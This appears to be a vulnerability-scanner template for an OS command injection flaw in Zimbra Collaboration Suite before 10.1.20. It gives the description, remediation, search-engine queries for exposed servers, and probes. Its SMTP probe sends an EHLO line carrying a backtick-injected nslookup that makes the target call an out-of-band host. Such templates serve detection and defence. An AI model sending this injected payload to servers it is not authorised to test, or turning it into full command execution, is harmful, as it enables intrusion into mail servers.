id: CVE-2026-73570 info: name: Zimbra Collaboration Suite < 10.1.20 - OS Command Injection author: 0x_Akoko,ritikchaddha severity: high description: | Zimbra Collaboration Suite (ZCS) before version 10.1.20 is vulnerable to OS command injection in the SNMP notification processing due to improper input sanitization. According to the NVD, when SNMP notifications are enabled and the zimbra-snmp package is installed, an unauthenticated attacker can inject arbitrary commands using crafted SMTP requests that result in malicious log entries. The swatchdog service monitors the log, and upon matching a pattern, passes the log content to zmsnmptrapd, which unsafely uses the Perl backtick operator to execute commands. This can ultimately allow remote attackers to execute arbitrary operating system commands as the zimbra user. Active exploitation of this vulnerability has been observed in the wild, as confirmed by CERT Polska and CISA. impact: | Unauthenticated remote code execution as the zimbra user. Successful exploitation allows webshell placement in /opt/zimbra/jetty/webapps/ or /opt/zimbra/jetty_base/webapps/, email credential theft, access to every mailbox on the server, and lateral movement to internal network resources. remediation: | Upgrade Zimbra Collaboration Suite to version 10.1.20 or later. The only complete fix is the 10.1.20 release (July 20, 2026). As a temporary mitigation, disable SNMP notifications (unset zimbraSnmpNotifyTrap) or uninstall the zimbra-snmp package and stop the swatchdog service. reference: - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/ - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-73570 - https://github.com/HORKimhab/CVE-2026-73570 - https://nvd.nist.gov/vuln/detail/CVE-2026-73570 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L cvss-score: 8.9 cve-id: CVE-2026-73570 epss-score: 0.11736 epss-percentile: 0.95938 cwe-id: CWE-78 metadata: verified: false max-request: 2 vendor: synacor product: zimbra_collaboration_suite shodan-query: - http.title:"Zimbra Web Client Sign In" - http.title:"Zimbra Collaboration Suite" - http.html:"Zimbra Collaboration Suite Web Client" fofa-query: - title="zimbra web client sign in" - title="zimbra collaboration suite" - app="Zimbra-Collaboration-Suite" tags: cve,cve2026,zimbra,rce,oast,kev,smtp,snmp,network,vkev flow: http(1) && tcp(1) http: - raw: - | GET /js/zimbraMail/share/model/ZmSettings.js HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "Zimbra Collaboration Suite Web Client")' - 'compare_versions(version, "< 10.1.20")' condition: and internal: true extractors: - type: regex name: version part: body group: 1 regex: - 'CLIENT_VERSION[^"]*defaultValue[^"]*"(\d+\.\d+\.\d+)' - '"(\d+\.\d+\.\d+)_GA' internal: true tcp: - host: - "{{Host}}:25" inputs: - data: "" read: 512 - data: "EHLO `nslookup {{interactsh-url}}`\r\n" read: 512 - data: "MAIL FROM:\r\n" read: 512 - data: "RCPT TO:\r\n" read: 512 - data: "QUIT\r\n" read: 64 matchers: - type: word part: interactsh_protocol words: - "dns" # digest: 4a0a004730450220249da29c2e5337f265b8d15dde6b2e544f970522cbdb6b7d16ec5c5a12b027f4022100a70865dbc331133b4dd130652f468d8ad93e8a664c565e2d5fc6b9b51918ef3e:922c64590222798bb761d5b6d8e72950